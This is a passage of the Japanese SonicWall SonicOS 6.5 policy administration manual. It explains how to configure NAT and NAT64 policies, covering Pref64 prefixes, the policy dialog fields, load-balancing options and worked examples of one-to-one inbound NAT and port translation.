AAAA レコード (IPv6) を作成します。 SonicOS は DNS64 サーバとしては機能しません。

Pref64::/n の使用

Pref64::/n は、 IPv6 と IPv4 間のプロ ト コル変換のためにアクセス ネッ トワークで使用される IPv6 接頭

辞です。 Pref64::/n 接頭辞は SonicOS で設定されます。 よ く知られた Pref64::/n 接頭辞 64:ff9b::/96は SonicOS によって自動的に作成されます。

Pref64::/n は、 IPv6 専用クライアン トから NAT64 を経由して IPv4 専用クライアン トに到達できるネッ

トワークを定義します。 SonicOS では、 ネッ トワーク 種別のアドレス オブジェ ク トは、 Pref64::/n を持つすべてのアドレスを含むように構成できます。 このアドレス オブジェク トは、 NAT64 を実行でき

るすべての IPv6 クライアン ト を表します。

DNS64 サーバは、 Pref64::/n を使用して、 初の n ビッ ト と Pref64::/n を比較することで、 IPv6 アドレ

スが IPv4 の埋め込まれた IPv6 アドレスであるかどうかを判断します。 DNS64 は、 Pref64::/n と IPv4 アドレス レコードを合成して DNS 応答を IPv6 専用クライアン トに送信することで、 IPv4 が埋め込まれ

た IPv6 アドレスを作成します。

Pref64::/n アドレス オブジェク トの設定については、 既定の Pref64 アドレス オブジェク ト (189 ページ)を参照して ください。

NAT ポリシー エン ト リの表示

トピック :

• 表示の変更 (107 ページ)

• 表示のフ ィルタ リング (108 ページ)

• ポリシーに関する情報の表示 (108 ページ)

表示の変更「ルール > NAT ポリシー」 ページには、 「検索」 、 「表示」 、 「表示」 、 および更新を含む、 ページ

の上部に表示オプシ ョ ンがあります。

重要 : 現時点での NAT64 機能は次のとおりです。

• TCP、 UDP、 および ICMP ト ラフ ィ ックを伝送するユニキャスト パケッ トのみを変換します。 • FTP および TFTP アプリケーシ ョ ン層プロ ト コルのス ト リームはサポート していますが、

H.323、 MSN、 Oracle、 PPTP、 RTSP、 および RealAudio アプリケーシ ョ ン層プロ ト コルのスト リームはサポート していません。

• IPv4 から開始された IPv6 ホストのサブセッ トへの通信をサポート していません。 • ステート フル高可用性をサポート していません。

NAT64 ト ラフ ィ ッ クの一致のために、 2 つの混在型接続キャッシュが作成されます。 そのため、

NAT64 接続キャッシュのキャパシテ ィは、 純粋な IPv4 または IPv6 接続用の半分となります。

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定107

ページの上部にある 「表示」 ドロップダウン リス トで、 次のいずれかのオプシ ョ ンを選択して、 NATポリシーの表示を変更できます。

表示のフ ィルタ リング「検索」 フ ィールドにポリシー番号 ( 「#」 列に記載されている番号) を入力することにより、 特定の

NAT ポリシーを表示できます。 「検索」 フ ィールド を使用して、 英数字の検索パターン (WLAN、 X1IP、 Private など) を入力して関心のあるポリシーのみを表示することもできます。

ポリシーに関する情報の表示「NAT ポリシー」 テーブルの 「コ メン ト」 列にあるコ メン ト アイコンの上にポインタを移動すると、

ユーザ定義ポリシーについては、 「NAT ポリシーの追加」 ダイアログの 「コ メン ト」 フ ィールドに入

力したコ メ ン トが表示されます。 既定のポリシーには、 IKE NAT ポリシーや NAT 管理用ポリシーな

ど、 NAT ポリシーの種別の簡単な説明があります。

「NAT ポリシー」 テーブルの 「設定」 列にある統計アイコンの上にポインタを移動すると、 NAT ポリ

シーのト ラフ ィ ック統計情報が表示されます。

「 NAT または NAT64 の追加または編集」 ポリシー

さまざまな種別の NAT ポリシーの例については、 NAT ポリシーの作成例 (114 ページ) を参照して く だ

さい。

すべての種別 「ユーザ定義ポリ シー」 および 「既定のポリ シー」 を含むすべてのルーテ ィ ング ポリシーが表示されます。 NAT ポリシーをまだ作成していない初

期段階では、 既定のポリシーだけが表示されます。

既定 既定のポリシーだけが表示されます。

ユーザ定義 設定した NAT ポリシーだけが表示されます。

メモ :既定の NAT ポリシーは編集できません。

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定108

NAT または NAT64 ポリシーを作成または編集するには :

1 管理ビューで、 「ポリシー | ルール > NAT ポリシー」 を開きます。

2 以下のいずれかを実行します。

• 新しい NAT ポリシーを作成するには、 ページの上部にある 「追加」 ボタンを選択します。

「NAT ポリシーの追加」 ダイアログが表示されます。

• 既存の NAT ポリシーを編集するには、 その NAT ポリシーの 「設定」 列にある編集アイコ

ンを選択します。 「NAT ポリシーの編集」 ダイアログが表示されます。

この 2 つのダイアログは同じ内容ですが、 「NAT ポリシーの編集」 ダイアログの一部のオプ

シ ョ ンは変更できません。 「IP バージ ョ ン」 で 「NAT64 のみ」 が選択されている場合、 オプ

シ ョ ンは変わります。

3 「一般」 画面で、 次の設定を行います。

• 変換前の送信元または IPv6 変換前の送信元: このドロップダウン メニューの設定は、 ファ

イアウォールを通過するパケッ ト (インターフ ェース間を転送されるパケッ トや、 VPNト ンネルに入る/から出るパケッ ト ) の送信元の IP アドレスを識別するために使用されま

す。 次の操作が可能です。

• 事前定義されたアドレス オブジェク ト を選択する

• 「すべて」 を選択する

• 独自のアドレス オブジェク ト を作成する

エン ト リ と して指定できるのは、 単一のホス トのエン ト リ、 アドレス範囲、 または IP サブネッ トです。

• 変換後の送信元または変換後の IPv4 送信元このドロップダウン メニューでは、 「変換前

の送信元」 で指定した送信元からのパケッ トがフ ァ イアウォールから出ると き (つま

ヒン ト : 「IPv6 変換前の送信元」 では、 IPv6 アド レス オブジェ ク トのみがド ロッ

プダウン メニューに表示され、 作成可能です。

IP バージョ ン IPv4 および IPv6 IP バージョ ン NAT64

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定109

り、 別のインターフェースに転送されるか、 VPN ト ンネルを出入りするとき)、 送信元を

どのアドレスに変換するかを設定します。 次の操作が可能です。

• 事前定義されたアドレス オブジェク ト を指定する

• 「オリジナル」 を選択する

• 独自のアドレス オブジェク ト エン ト リを作成する

エン ト リ と して指定できるのは、 単一のホス トのエン ト リ、 アドレス範囲、 または IP サブネッ トです。

• 変換前の送信先または Pref64: このドロップダウン メニューでは、 ファイアウォールを通

過するパケッ ト (インターフ ェース間を転送されるパケッ トや、 VPN ト ンネルを出入り

するパケッ ト ) の送信先 IP アドレスを指定します。 発信 NAT ではパケッ トの送信先は変

更されず、 送信元のみが変更されるので、 発信 NAT ポリシーの作成時には、 通常、 この

エン ト リは 「すべて」 に設定します。 ただし、 これらのアドレス オブジェク トのエン ト

リ と して、 単一のホストのエン ト リ、 アドレス範囲、 または IP サブネッ ト を指定するこ

ともできます。

• 変換後の送信先: このドロップダウン メニューでは、 「変換前の送信先」 で指定した送信

先へのパケッ トがフ ァイアウォールから出るとき (つまり、 別のインターフ ェースに転

送されるか、 VPN ト ンネルを出入りするとき)、 送信先をどのアドレスに変換するかを設

定します。 発信 NAT ではパケッ トの送信先は変更されず、 送信元のみが変更されるの

で、 発信 NAT ポリシーの作成時には、 通常、 このエン ト リは 「オリジナル」 に設定しま

す。 ただし、 これらのアドレス オブジェク トのエン ト リ と して、 単一のホストのエン ト

リ、 アドレス範囲、 または IP サブネッ ト を指定することもできます。

• 変換前のサービス: このドロップダウン メニューでは、 フ ァイアウォールを通過するパ

ケッ ト (イン ターフ ェース間を転送されるパケッ トや、 VPN ト ンネルを出入りするパ

ケッ ト ) の IP サービスを指定します。 ユーザはファイアウォールの事前定義されたサー

ビスを使用するか、 または独自のエン ト リ を作成するこ とができます。 多 く の場合、NAT ポリシーでは送信元または送信先の IP アドレスのみを変更するので、 このフ ィール

ドは 「すべて」 に設定します。

• 変換後のサービス: このドロップダウン メニューでは、 「変換前サービス」 で指定した

サービスのパケッ トがフ ァイアウォールから出るとき (つまり、 別のインターフ ェース

に転送されるか、 VPN ト ンネルを出入りするとき)、 そのサービスをどのサービスに変換

するかを設定します。 ユーザはファイアウォールの事前定義されたサービスを使用するか、 または独自のエン ト リを作成することができます。 多くの場合、 NAT ポリシーでは

送信元または送信先の IP アド レスのみを変更するので、 このフ ィールドは 「オリジナ

ル」 に設定します。

ヒン ト : 「Pref64」 の場合、 これは NAT ポリシーの変換前の送信先です。 IPv6 ネッ

トワーク アドレス オブジェク トのみがドロップダウン メニューに表示され、 作成

可能です。 Pref64 は常に pref64::/n ネッ トワークです。 これは AAAA レコード

を作成するために DNS64 によって使用されます。

「既知の Pref64」 を選択する こ と も、 ネ ッ ト ワーク ア ド レス オブジ ェ ク ト を

Pref64 と して設定することもできます。

メ モ : 「IP バージ ョ ン」 が 「NAT64 のみ」 の場合、 このオプシ ョ ンは 「埋め込み

IPv4 アドレス」 に設定され、 変更できません。

メモ : 「IP バージ ョ ン」 が 「NAT64 のみ」 の場合、 このオプシ ョ ンは 「ICMP UDPTCP」 に設定され、 変更できません。

メモ : 「IP バージ ョ ン」 が 「NAT64 のみ」 の場合、 このオプシ ョ ンは 「変換前」 に

設定され、 変更できません。

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定110

• 受信インターフェース: このドロップダウン メニューでは、 パケッ ト を受信するインター

フェースを指定します。 既定は 「すべて」 です。

VPN ト ンネルは実際のインターフ ェースではないので、 VPN を扱う場合は、 通常、 「す

べて」 (既定) に設定します。

• 発信インターフェース: このドロップダウン メニューでは、 NAT ポリシー適用後のパケッ

ト を送信するインターフ ェースを指定します。 このフ ィールドは主に、 どの WAN イン

ターフェースに変換を適用するかを指定するために使用されます。

VPN ト ンネルは実際のインターフ ェースではないので、 VPN を扱う場合は、 通常、 「す

べて」 (既定) に設定します。 また、 NAT ポリシーの作成例 (114 ページ) に記載されてい

るように、 送信先をパブリ ック IP アドレスからプライベート IP アドレスに再割付する受

信 1 対 1 NAT ポリシーの作成時には、 このフ ィールドを 「すべて」 に設定する必要があ

ります。

• コ メン ト : このフ ィールドは NAT ポリシー登録の説明を記述するために使用できます。

フ ィールドに入力できるのは 大 32 文字です。 保存後に 「ルール > NAT ポリシー」 メ イ

ン ページで NAT ポリシー エン ト リの 「コ メ ン ト」 アイコンにマウスを移動すると、 こ

こで指定した説明が表示されます。 コ メン トは、 マウスが 「コ メン ト」 アイコン上にある間、 ポップアップ ダイアログに表示されます。

• IP バージ ョ ン: IP バージ ョ ンを選択します。

• IPv4 のみ (既定)

• IPv6 のみ

• NAT64 のみ

• NAT ポリシーを有効にする: 既定では、 このチェ ックボックスがオンになっています。 こ

れは、 新しい NAT ポリシーが保存された瞬間に有効になることを意味します。 NAT ポリ

シー エン ト リを作成しても、 すぐに有効にしないようにするには、 このチェ ックボック

スをオフにします。

• 再帰ポリシーを作成する: このチェ ックボックスをオンにすると、 「NAT ポリシーの追加」

ダイアログで定義した NAT ポリシーに対応する ミ ラーの発信または受信 NAT ポリシーが

自動的に作成されます。 このオプシ ョ ンは、 既定では選択されていません。

4 NAT 負荷分散を設定するには、 「詳細」 を選択します。 それ以外の場合は、 手順 8 にスキップし

て、 現在の構成でポリシーを追加します。

重要 : このフ ィールドの設定は、 NAT ポリシーのさまざまなフ ィールドの中でも特

に混乱しやすいので注意して ください。

メモ : 「NAT ポリシーの編集」 ダイアログでは IP バージ ョ ンを変更できません。

重要 : 「NAT ポリシーの追加」 ダイアログのオプシ ョ ンは、 「NAT64 のみ」 が選択

されると変更され、 「詳細」 ボタンは表示されません。

メモ : 「詳細」 ボタンは、 「NAT64 のみ」 が 「IP バージ ョ ン」 で選択されている場合、 表

示されません。

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定111

5 「NAT 方式」 の 「詳細」 画面で、 「NAT 方式」 ドロップダウン リストから次のいずれかを選択し

ます。

• スティ ッキー IP - 送信元 IP は、 (その接続先が接続可能な状態であるならば) 常に同じ送信

先 IPに接続されます。 この方式は、 ウ ェ ブ アプ リ ケーシ ョ ン、 ウ ェ ブ フ ォーム、

シ ョ ッピング カート アプリケーシ ョ ンなど、 接続の恒久性が要求される公開ホス トの

サイ トに 適です。 これは既定のメカニズムであり、 ほとんどの配備環境では、 この方式を使用することをお勧めします。

• ラウンド ロビン - 送信元 IP は、 循環的な順序で、 動作中の負荷分散対象の各リソースに

順に振り分けられます。 この方式は、 恒久性が要求されない状況で負荷を均等に分散したい場合に 適です。

• ブロッ ク再割付/対称再割付 - この 2 つの方式は、 送信元 IP/ネッ トワークが既知のとき

(特定のサブネッ トからのト ラフ ィ ッ クの変換方法を精密に制御したい場合など) に有用

です。

• ランダム分散 - 送信元 IP は、 各送信先 IP にランダムに接続されます。 この方式は、 ト ラ

フ ィ ッ クを対象の内部リソース全体に無作為に分散させたい場合に有用です。

6 必要に応じて、 ファイアウォールで NAT ポリシーの IP アドレス変換のみを行い、 ポート変換を

行わないように指定するには、 「送信元ポートの変換を無効にする」 チェ ッ クボッ クスをオンにします。 SonicOS は、 ほかの NAT マッピングを実行している間も接続の送信元ポート を保持

メモ : 「送信元ポートの変換を無効にする」 オプシ ョ ンを除き、 このタブの他のすべてのオプシ ョ ンは、 「一般」 画面のいずれかのドロップダウン メニューでグループを指定

したときだけ有効になります。 このタブが無効の場合、 NAT ポリシーでは NAT 方式として

既定の 「ステ ィ ッキー IP」 が使用されます。

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定112

します。 このオプシ ョ ンは、 送信元 IP アドレスが変換されている場合の NAT ポリシーの追加ま

たは編集時に使用できます。 このオプシ ョ ンは、 既定では選択されていません。

メ ンテナンスその他の理由でインターフ ェースを一時的にオフラインにするとき、 このオプシ ョ ンを選択します。 接続していたリンクは切断されます。 チェ ッ クボッ クスをオフにすると、 インターフェースが有効になり再びリンクが接続されます。

7 「高可用性」 セクションで、 オプショ ンで 「論理監視を有効にする」 を選択します。 このチェ ック ボックスがオンの場合、 SonicOS は、 2 つの方法 (ICMP Ping による単純な問い合わせによって

リソースが動作中であるかを判断する方法と、 TCP ソケッ トが開いているかを問い合わせて、

リ ソースが動作中であるかを判断する方法) のどちらかを使用して、 負荷分散グループ内のア

ドレスの動作状態を監視します。 この問い合わせは設定可能な一定の間隔で行われ、 これにより、 応答のないリソースへのト ラフ ィ ッ クの振り分けの中止と、 応答が復活した時点でのそのリソースの使用再開が可能になります。

「論理監視を有効にする」 チェ ッ クボッ クスをオンにすると、 以下のオプシ ョ ンが利用可能になります。

• ホス トの論理監視間隔 n 秒毎 - ホス トの論理監視の間隔を指定します。 既定値は 5 秒です。

• 論理監視種別 - 論理監視種別 (TCP など) をドロップダウン メニューから選択します。 既

定は Ping (ICMP) です。

• ポート - ポート を指定します。 既定値は 80 です。

• 応答タイムアウト - タイムアウトまでの 大時間を指定します。 既定値は 1 秒です。

• ホスト を停止するまでの無応答回数 n 回 - この回数を超えて応答が無い場合はホスト を

停止します。 既定値は 3 です。

• 停止したホストを再度有効にするまでの応答回数 n 回 - この回数以上応答に成功した場合

はホスト を再度有効にします。 既定値は 3 です。

• ポート プローブを有効にする - 上で選択した 「論理監視種別」 使用してポート プローブ

を有効にする場合に選択します。 このオプシ ョ ンを選択すると、 負荷分散時にポート も考慮するように NAT 機能が強化されます。 このオプシ ョ ンは、 既定では無効になってい

ます。

• RST 応答を未応答としてカウントする - RST 応答を未応答としてカウントするときに選択し

ます。 このオプシ ョ ンは、 「ポート プローブを有効にする」 を選択した場合に、 既定で

選択されます。

8 ポリシーを編集する場合は、 「追加」 を選択して NAT ポリシーを追加するか、 「OK」 を選択し

ます。

NAT ポリシーの削除単一の NAT ポリシーを削除するには、 NAT ポリシーエン ト リの 「設定」 列で 「削除」 アイコン (X) を選択します。 このアイコンが淡色表示である場合、 その NAT ポリシーは既定のエン ト リなので削除で

きません。

メモ : このオプシ ョ ンは、 「変換後の送信元」 ( 「一般」 画面上) が 「オリジナル」 に設定

された場合、 無効で淡色表示になります。

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定113

1 つまたは複数のカスタムポリシーを削除するには、 ポリシーのチェ ッ クボッ クスをオンにして、

テーブルの上部にある 「削除」 を選択し、 「選択項目の削除」 を選択します。

すべてのカスタムポリシーを削除するには、 表の上部にある 「削除」 を選択し、 「すべて削除」 を選択します。

既定のポリシーは削除できません。

NAT ポリシーの作成例NAT ポリシーを使用すると、 送信元の IP アドレス、 送信先の IP アドレス、 および送信先サービスの

一致する組み合わせに基づいて NAT (ネッ トワーク アドレス変換) を柔軟に制御できます。 NAT はポリ

シーに基づいて適用されるため、 異なる種類の NAT を同時に配備することができます。

特に指定のないかぎり、 このセクシ ョ ンの例では、 次の IP アド レスを例と して使用して、 NAT ポリ

シーの作成と有効化を実証しています。 ここで示す例をお使いの IP アドレスと置き換えるこ とによ

り、 これらの例を使用して、 ネッ トワークの NAT ポリシーを作成することができます。

• 192.168.10.0/24 (インターフェース X0 上の IP サブネッ ト )

• 67.115.118.64/27 (インターフェース X1 上の IP サブネッ ト )

• 192.168.30.0/24 (インターフェース X3 上の IP サブネッ ト )

• X0 の IP アドレスは 192.168.10.1

• X1 の IP アドレスは 67.115.118.68

• ウェブ サーバの“プライベート "アドレスは 192.168.30.200

• ウェブ サーバの“パブリ ック"アドレスは 67.115.118.70

• パブリ ック IP 範囲のアドレスは 67.115.118.71 から 67.115.118.74

ト ピッ ク :

• 着信ト ラフ ィ ッ ク用の 1 対 1 の NAT ポリシーの作成 (115 ページ)

• 着信ト ラフ ィ ッ ク用の 1 対 1 の NAT ポリシーの作成 (118 ページ)

• 1 対 1 の NAT ポリシー ルールによる着信ポート アドレス変換 (120 ページ)

• WAN IP アドレス経由の着信ポート アドレス変換 (125 ページ)

• 多対 1 の NAT ポリシーの作成 (130 ページ)

• 多対多の NAT ポリシーの作成 (132 ページ)

• 1 対多の NAT 負荷分散の設定 (135 ページ)

• 2 つのウェブ サーバの NAT 負荷分散の設定 (138 ページ)

• NAT64 ポリシーのための WAN から WAN へのアクセス ルールの作成 (146 ページ)

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定114

着信ト ラフ ィ ッ ク用の 1 対 1 の NAT ポリシーの作成

1 対 1 NAT ポリシーは、 SonicWall セキュ リテ ィ アプライアンスで も一般的に使用される NAT ポリ

シーの種別です。 このポリシーによって、 外部の公開 IP アドレスを内部のプライベート IP アドレス

に変換できます。 この NAT ポリシーを 「許可」 アクセス ルールと組み合わせると、 公開 IP アドレス

を使用して、 任意の送信元を内部サーバに接続できます。 フ ァ イアウォールは、 プライベート アド

レスと公開ア ド レス間の変換を処理します。 このポリシーを適用すると、 フ ァ イアウォールは、webserver_public_ip へ着信したト ラフ ィ ッ クを、 webserver_private_ip に送信します。

また、 すべてのユーザがウェブ サーバのパブリ ック IP アドレス経由でウェブ サーバへの HTTP 接続を

確立できるようにアクセス ルールを作成する必要があります。

この 1 対 1 インバウンド NAT ポリシーのミ ラー (リフレクテ ィブ) ポリシーは、 着信ト ラフ ィ ッ ク用の

1 対 1 の NAT ポリシーの作成 (118 ページ) を参照して ください。

内部サーバの実際のリスニング ポートを隠し、 別のポートのサーバにパブリック アクセスを提供するに

は、 1 対 1 の NAT ポリシー ルールによる着信ポート アドレス変換 (120 ページ) を参照して ください。

着信ト ラフ ィ ッ ク用の 1 対 1 のポリシーを作成するには、 以下の手順に従います。

1 管理ビューで、 「ポリシー | ルール > アクセス ルール」 ページを開きます。

2 「追加」 を選択して 「ルールの追加」 ダイアログを表示します。

3 オプシ ョ ンの選択: 1 対 1 着信ト ラフ ィ ッ クのアクセス ルールの例の値を入力します。

オプシ ョ ンの選択: 1 対 1 着信ト ラフ ィ ックのアクセス ルールの例

オプシ ョ ン 値

動作 許可

送信元 WAN

送信先 サーバが配置されているゾーンを選択します。

送信元ポート ポート を選択。 既定は 「すべて」

メモ : 「送信元ポート」 を設定すると、 アクセス ルールは選択さ

れたサービス オブジェ ク ト /グループで定義されている送信元

ポートに基づいて ト ラフ ィ ッ クをフ ィルタ処理します。 選択されたサービス オブジェ ク ト /グループには、 「サービス」 で選択す

るのと同じプロ ト コル種別が設定されている必要があります。

サービス HTTP

送信元 すべて

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定115

4 「追加」 を選択します。 ルールが追加されます。

5 「閉じる」 を選択します。

6 「ポリシー | ルール > NAT ポリシー」 ページを開きます。

7 「追加」 を選択して、 「NAT ポリシーの追加」 ダイアログを表示します。

8 オプシ ョ ンの選択: 1 対 1 着信 NAT ポリシーテーブルに表示された値を入力します。

送信先 webserver_public_ip (サーバのパブリ ッ ク IP アドレスを含むアドレ

スオブジェク ト )

包含ユーザ すべて (既定)

除外ユーザ なし (既定)

スケジュール 常に有効 (既定)

コ メン ト 簡単な説明を入力

ログを有効にする 選択

断片化パケッ トを許可する 選択

他のすべてのオプシ ョ ン 未選択

オプシ ョ ンの選択: 1 対 1 着信ト ラフ ィ ックのアクセス ルールの例

オプシ ョ ン 値

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定116

9 「追加」 を選択し、 「閉じるを選択します。

設定が完了したら、 パブリ ッ ク インターネッ ト上に配置されているシステムを使用して、 ウェブ

サーバのパブリ ッ ク IP アドレスへのアクセスを試行します。 正常に接続できるはずです。 接続不可

の場合は、 このセクシ ョ ンと着信ト ラフ ィ ッ ク用の 1 対 1 の NAT ポリシーの作成セクシ ョ ンを調べ

て、 必要なすべての項目を正し く設定したことを確認します。

オプシ ョ ンの選択: 1 対 1 着信 NAT ポリシー

オプシ ョ ン 値

変換前の送信元 すべて

変換後の送信元 オリジナル

変換前の送信先 webserver_public_ip

変換後の送信先 webserver_private_ip

変換前のサービス HTTP

変換後のサービス オリジナル

受信インターフェース X1

発信インターフェース すべて

メモ : サーバが接続されているイ ン ターフ ェ ースではな く、「すべて」 を選択します。

コ メン ト 簡単な説明を入力

NAT ポリシーを有効にする オン

再帰ポリシーを作成する チェ ックされていない

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定117

着信ト ラフ ィ ッ ク用の 1 対 1 の NAT ポリシーの作成

着信ト ラフ ィ ッ ク用の 1 対 1 の NAT は、 外部のパブリ ッ ク IP アドレスを内部のプライベート IP アド

レスに変換できます。 この NAT ポリシーを "許可" アクセス ポリシーと組み合わせると、 任意の送信

元がパブリ ッ ク IP アドレスを使用して内部サーバに接続できるようになります。 プライベート アド

レスとパブリ ッ ク アド レス間の変換は SonicWall によって処理されます。 このポリシーを適用する

と、 SonicWall セキュリテ ィ装置は、 WAN インターフェース (既定では X1 インターフェース) 経由での

接続要求の到着時に、 サーバのパブリ ッ ク IP アドレスをプライベート IP アドレスに変換します。 以下では、 必要なアドレス オブジェ ク ト と と もに NAT ポリシーを作成し、 同時に発信ト ラフ ィ ッ ク用

の再帰 NAT ポリシーも作成します。 再帰的 NAT ポリシーは着信ト ラフ ィ ッ ク用の 1 対 1 の NAT ポリ

シーの作成 (115 ページ) に記述されています。

発信ト ラフ ィ ッ ク用の 1 対 1 のポリシーを作成するには、 以下の手順に従います。

1 管理ビューで、 「ポリシー | オブジェク ト > アドレス オブジェク ト」 ページを開きます。

2 ページの上部にある 「追加」 を選択します。 「アドレス オブジェク トの追加」 ダイアログが表

示されます。

3 「名前」 フ ィールドに、 webserver_private_ip など、 サーバのプライベート IP アドレスのわかりや

すい説明を入力します。

4 「ゾーンの割り当て」 ドロップダウン メニューから、 サーバに割り当てるゾーンを選択します。

5 「種別」 ドロップダウン メニューで 「ホス ト」 を選択します。

6 「IP アドレス」 フ ィールドにサーバのプライベート IP アドレスを入力します。

7 「追加」 を選択します。 新しいアドレス オブジェク トが 「アドレス オブジェク ト」 テーブルに

追加されます。

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定118

8 次に、 手順 2 ~手順 7 を繰り返して 「アドレス オブジェク トの追加」 ダイアログで、 サーバの

パブリ ッ ク IP アド レスに別のオブジェ ク ト を作成し、 「ゾーンの割り当て」 ド ロ ップダウン

メニューで 「WAN」 を選択します。 「名前」 は、 webserver_public_ip を使用して ください。

9 「追加」 を選択してアドレス オブジェク ト を作成します。 新しいアドレス オブジェク トが 「ア

ドレス オブジェク ト」 テーブルに追加されます。

10 「閉じる」 を選択して 「アドレス オブジェク トの追加」 ダイアログを閉じます。

11 「ポリシー | ルール > NAT ポリシー」 ページを開きます。

12 ページの上部にある 「追加」 を選択します。 「NAT ポリシーの追加」 ダイアログが表示され

ます。

13 NAT ポリシーを作成することにより、 ウェブ サーバがマッピング済みのパブリ ック IP アドレス

を使用してパブリ ッ ク インターネッ トへのト ラフ ィ ッ クを開始できるよ うにするには、 オプ

シ ョ ンの選択: 発信ト ラフ ィ ッ ク用の 1 対 1 の NAT ポリシーの例のオプシ ョ ンを選択します。

オプシ ョ ンの選択: 発信ト ラフ ィ ッ ク用の 1 対 1 の NAT ポリシーの例

オプシ ョ ン 値

変換前の送信元 webserver_private_ip

変換後の送信元 webserver_public_ip

変換前の送信先 すべて

変換後の送信先 オリジナル

変換前のサービス すべて

変換後のサービス オリジナル

受信インターフェース X3

発信インターフェース X1

コ メン ト 簡単な説明を入力

NAT ポリシーを有効にする オン

再帰ポリシーを作成する (翻訳先がオリジナルの場

合は淡色表示されます)

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定119

14 設定が完了したら、 「追加」 ボタンを選択し、 NAT ポリシーを追加して有効にします。

15 「閉じる」 を選択して 「NAT ポリシーの追加」 ダイアログを閉じます。

このポリシーを適用すると、 フ ァ イアウォールは、 WAN イン ターフ ェース (既定では X1 インター

フェース) からのト ラフ ィ ック開始時に、 サーバのプライベート IP アドレスをパブリ ック IP アドレス

に変換します。

サーバでウェブ ブラウザを開き、 公開ウェブサイ ト http://www.whatismyip.com にアクセスするこ と

によって、 1 対 1 の割付をテストできます。 このウェブ サイ トには、 作成したばかりの NAT ポリシー

でプライベート IP アドレスに付加された公開 IP アドレスが表示されるはずです。

1 対 1 の NAT ポリシー ルールによる着信ポート アドレス変換

このタ イプの NAT ポリシーは、 内部サーバの実際のリスニング ポー ト を隠して、 別のポー ト での

サーバへのパブリ ッ ク アクセスを可能にしたい場合に便利です。 以下の例では、 着信ト ラフ ィ ッ ク

用の 1 対 1 の NAT ポリシーの作成セクシ ョ ンで作成した NAT ポリシーとルールを変更して、 パブリ ッ

ク ユーザがパブリ ッ ク IP アド レスを通じてプライベート ウェブ サーバに接続できるよ うにします

が、 その接続には、 標準の HTTP ポート (TCP 80) の代わりに、 別のポート (TCP 9000) を使用するように

設定します。

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定120

着信ポート アドレス変換のための 1 対 1 のポリシーを作成するには、 以下の手順に従います。

1 管理ビューで、 「ポリシー | オブジェク ト > サービス オブジェク ト」 ページを開きます。 この

ページでは、 使用する非標準ポートのユーザ定義サービスを作成します:

2 「サービス オブジェク ト」 画面で 「追加」 を選択して、 「サービスの追加」 ダイアログを表示

します。

3 ユーザ定義サービスに webserver_public_port などのわかりやすい名前を付けます。

4 「プロ ト コル」 ドロップダウン メニューで 「TCP (6)」 を選択します。

5 「ポート範囲」 の場合、 両方のフ ィールドに9000 をサービスの開始および終了ポート番号とし

て入力します。

6 設定が完了したら、 「追加」 ボタンを選択してユーザ定義サービスを保存し、 「閉じる」 を選択します。

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定121

「サービス オブジェク ト」 画面が更新されます。

7 「ルール > NAT ポリシー」 ページを開きます。

着信ト ラフ ィ ッ ク用の 1 対 1 の NAT ポリシーの作成セクシ ョ ンで作成した、 パブリ ック ユーザ

がパブリ ッ ク IP アドレスを通じてプライベート ウェブ サーバに接続できるようにする NAT ポリシーを変更します。

8 NAT ポリシーの横の 「編集」 ボタンを選択します。 「NAT ポリシーの編集」 ダイアログが表示

されます。

9 オプシ ョ ンの選択: 1 対 1 の NAT ポリシー ルールによる着信ポート アドレス変換テーブルのオ

プシ ョ ンを設定して NAT ポリシーを編集します。

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定122

10 「OK」 を選択し、 「閉じる」 を選択します。

このポリシーを適用すると、 フ ァ イアウォールは、 WAN インターフ ェース (既定では X1 イン

ターフ ェース) 経由での接続要求の到着時に、 サーバのパブリ ッ ク IP アドレスをプライベート

IP アド レスに変換し、 要求されたポート (TCP 9000) をサーバの実際のリスニング ポート (TCP80) に変換します。

オプシ ョ ンの選択: 1 対 1 の NAT ポリシー ルールによる着信ポート アドレス変換

オプシ ョ ン 値

変換前の送信元 すべて

変換後の送信元 オリジナル

変換前の送信先 webserver_public_ip

変換後の送信先 webserver_private_ip

変換前のサービス webserver_public_port (または上記で付けた任意の名前)

変換後のサービス HTTP

受信インターフェース X1

発信インターフェース すべて

コ メン ト 簡単な説明を入力

NAT ポリシーを有効にする オン

メモ : 着信インターフ ェースの設定では、 サーバが接続されているインターフ ェースを指定するのではな く、 必ず 「すべて」 を選択して く ださい。 これは直観に反しているように思われるかもしれませんが、 正しい設定です (インターフェースを指定しよう とする

と、 エラーが発生します)。

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定123

11 後に、 前のセクシ ョ ンで作成したファイアウォール アクセス ルールを変更して、 すべての

パブリ ッ ク ユーザがサーバの実際のリスニング ポート (TCP 80) の代わりに新しいポート (TCP9000) でウェブ サーバに接続できるようにします。

「ルール > アクセス ルール]ページに移動し、 webserver_public_ip のルールを検索します。

12 「編集」 アイコンを選択し、 「ルールの編集」 ダイアログでルールを表示します。

13 オプシ ョ ンの選択: 1 対 1 の NAT ポリシー ルールによる着信ポート アドレス変換テーブルに従っ

て値を編集します。

オプシ ョ ンの選択: 1 対 1 の NAT ポリシー ルールによる着信ポート アドレス変換

オプシ ョ ン 値

動作 許可

サービス webserver_public_port (または任意の名前)

送信元 すべて

送信先 webserver_public_ip

許可ユーザ すべて

スケジュール 常に有効

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定124

14 「OK」 を選択します。

確認するには、 パブリ ッ ク インターネッ ト上に配置されているシステムを使用して、 新しい個別

ポートでウェブ サーバのパブリ ック IP アドレスにアクセスして く ださい (例: http://67.115.118.70:9000 など)。 正常に接続できるはずです。 接続不可の場合は、 この

